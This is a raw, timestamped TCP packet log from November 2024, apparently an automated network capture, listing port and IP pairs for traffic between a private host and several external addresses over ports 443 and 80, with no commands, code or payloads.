                                                                                                                                                                      Nov 21, 2024 06:23:35.323818922 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.323834896 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.361125946 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.361183882 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.361239910 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.361336946 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.361351967 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.361361027 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.361366987 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.363415003 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.363455057 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.363532066 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.363682032 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.363699913 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.528981924 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.529057026 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.529114008 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:35.529267073 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:35.529283047 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.529355049 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:35.529367924 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.615717888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:35.628031969 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.628089905 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.628144979 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.628293037 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.628304005 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.628354073 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.628360033 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.630429983 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.630480051 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.630561113 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.630676985 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.630693913 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.735186100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.735284090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:35.735441923 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:35.854942083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:36.017954111 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:36.018027067 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:36.018075943 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:36.018244982 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:36.018264055 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:36.018270016 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:36.018275976 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:36.021297932 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:36.021342039 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:36.021414995 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:36.021553040 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:36.021568060 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.008507013 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.028789043 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.028799057 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.029544115 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.029550076 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.067737103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.067783117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.067847013 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.068806887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.068828106 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.068844080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.068878889 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.069335938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.069374084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.069380999 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.069389105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.069425106 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.070555925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.070576906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.070619106 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.104015112 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.127789021 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.127805948 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.128359079 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.128367901 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.141788960 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.150826931 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.150860071 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.155416965 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.155443907 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.187722921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.187880993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.187932968 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.191947937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.193705082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.193725109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.193758965 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.246448994 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.260596991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.260616064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.260691881 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.263093948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.263194084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.263251066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.271442890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.271636009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.271682024 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.279793978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.279922962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.279966116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.288188934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.288316011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.288362980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.296556950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.296653986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.296704054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.304903030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.305012941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.305059910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.313260078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.313375950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.313414097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.321643114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.321695089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.321743011 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.330045938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.330177069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.330228090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.338505030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.350019932 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.384126902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.399709940 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.413211107 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.413237095 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.413922071 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.413929939 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.428195000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.428284883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.428337097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.432329893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.443506956 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.443571091 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.443623066 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.448519945 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.448544979 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.448556900 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.448563099 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.452603102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.452646017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.452678919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.454794884 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.454835892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.456260920 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.456317902 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.456370115 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.456593990 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.456613064 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.456620932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.456737995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.456777096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.461093903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.461199999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.461241007 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.465594053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.465688944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.465738058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.470043898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.470132113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.470165968 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.474530935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.474677086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.474720001 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.478988886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.479104996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.479151964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.483504057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.483623981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.483663082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.487956047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.488080978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.488120079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.492396116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.492530107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.492571115 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.496893883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.497023106 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.497061014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.501398087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.501492977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.501535892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.505902052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.506033897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.506076097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.510313988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.510519981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.510562897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.514873028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.515044928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.515085936 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.519262075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.519346952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.519655943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.523799896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.523885965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.523926020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.528230906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.528352976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.528405905 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.532744884 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.532942057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.532982111 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.537180901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.537292004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.537400961 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.554167032 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.554250956 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.554302931 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.554476023 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.554501057 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.554517031 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.554523945 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.557640076 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.557677031 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.557825089 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.557939053 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.557948112 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.585886955 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.585968018 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.586019993 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.586131096 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.586150885 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.586164951 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.586172104 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.589129925 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.589154959 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.589225054 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.589389086 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:37.589401007 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.620234966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.620294094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.620349884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.622421980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.622484922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.622530937 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.626643896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.644498110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.644542933 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.644622087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.646224976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.646266937 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.646389008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.649666071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.649705887 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.649739027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.652461052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.652555943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.652575970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.655858040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.655900955 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.655971050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.659311056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.659364939 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.659390926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.662494898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.662533998 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.662616014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.665745974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.665792942 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.665852070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.668916941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.668967009 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.669008017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.672276020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.672322035 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.672329903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.675271034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.675323963 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.675395012 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.678383112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.678427935 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.678500891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.681556940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.681606054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.681648016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.684726954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.684787035 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.684827089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.687905073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.687972069 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.687992096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.691061974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.691114902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.691154957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.694216967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.694261074 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.694430113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.697396040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.697443962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.697515011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.700539112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.700586081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.700629950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.703718901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.703748941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:37.703764915 CET4976280192.168.2.6185.215.113.16
